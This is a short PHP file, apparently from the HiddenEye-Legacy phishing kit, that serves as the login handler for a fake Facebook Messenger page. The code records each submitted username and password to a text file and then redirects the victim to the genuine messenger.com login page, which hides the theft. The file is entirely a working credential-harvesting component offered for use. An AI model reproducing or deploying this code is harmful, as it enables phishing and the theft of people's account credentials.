HiddenEye-Legacy/WebPages/fb_messenger/login.php

7 lines
213 B
PHP

<?php
include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://messenger.com/login.php');
exit();